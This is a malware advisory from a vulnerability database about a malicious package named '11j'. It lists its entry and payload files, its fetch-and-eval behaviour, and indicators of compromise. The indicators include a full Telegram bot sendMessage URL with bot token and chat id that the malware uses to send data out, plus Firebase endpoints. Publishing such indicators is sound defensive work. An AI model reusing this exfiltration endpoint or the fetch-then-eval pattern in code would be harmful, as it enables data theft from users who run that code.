VDB
GCVE-110-OSM-2026-5215
GCVE-110-OSM-2026-5215
Advisory PublishedCVSS 9.6/10
Malicious package detected. Behaviors: data exfiltration, code execution, network activity.
Entrypoint: log.js (main: log.js)
Exfil: https://api.telegram.org/bot989543891:AAF37LnTjES5QkPcjOVyQ8ZlwzVKedqUm7Y/sendMessage?chat_id=-1001161709623&text=${...} (reconstructed, recovery: reconstructed)
Payload: t.js
Secondary files: o.js, m.js
Key findings:
- Webhook Data Exfiltration in m.js: "api.telegram.org/bot989543891:AAF37LnTjES5QkPcjOVyQ8ZlwzVKedqUm7Y/sendMessage"
- Webhook Data Exfiltration in mod.js: "api.telegram.org/bot989543891:AAF37LnTjES5QkPcjOVyQ8ZlwzVKedqUm7Y/sendMessage"
- Webhook Data Exfiltration in o.js: "api.telegram.org/bot989543891:AAF37LnTjES5QkPcjOVyQ8ZlwzVKedqUm7Y/sendMessage"
- Fetch and Eval/Exec in t.js: "Fetch(get)//toNodeFetch(list)
// x = await eval"
- Suspicious URL Pattern in Template Literal in m.js: "https://api.telegram.org/bot989543891:AAF37LnTjES5QkPcjOVyQ8ZlwzVKedqUm7Y/sendMe..."
IOCs:
- urls: https://i----i.firebaseio.com/ff.json, https://i----i.firebaseio.com/.json, https://jiijii.firebaseio.com/.json, https://api.telegram.org/bot989543891:AAF37LnTjES5QkPcjOVyQ8ZlwzVKedqUm7Y/sendMessage?chat_id=-1001161709623&text=${...}, https://api.telegram.org/bot989543891:AAF37LnTjES5QkPcjOVyQ8ZlwzVKedqUm7Y/sendMessage?chat_id=${...}&text=${...}
- domains: randomuser.me, i----i.firebaseio.com, ibb.co, www.mapquestapi.com, jiijii.firebaseio.com (+2 more)
- telegramApi: api.telegram.org/bot989543891:AAF37LnTjES5QkPcjOVyQ8ZlwzVKedqUm7Y/sendMessage?chat_id=${, api.telegram.org/bot989543891:AAF37LnTjES5QkPcjOVyQ8ZlwzVKedqUm7Y/sendMessage?chat_id=${x}&text=${encodeURIComponent(z)}`), api.telegram.org/bot989543891:AAF37LnTjES5QkPcjOVyQ8ZlwzVKedqUm7Y/sendMessage?chat_id=${id}&text=${encodeURIComponent(z)}`)
- payloadFileHash: 15f48dcbb29bfe24632c0f3ff0e47a44cdbdc004c7d3fc855a3959c4973edb8e
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | 11j | all (affected) | — |
Aliases
Browse GCVE Records
73,738 records in the GCVE database · Updated July 19, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.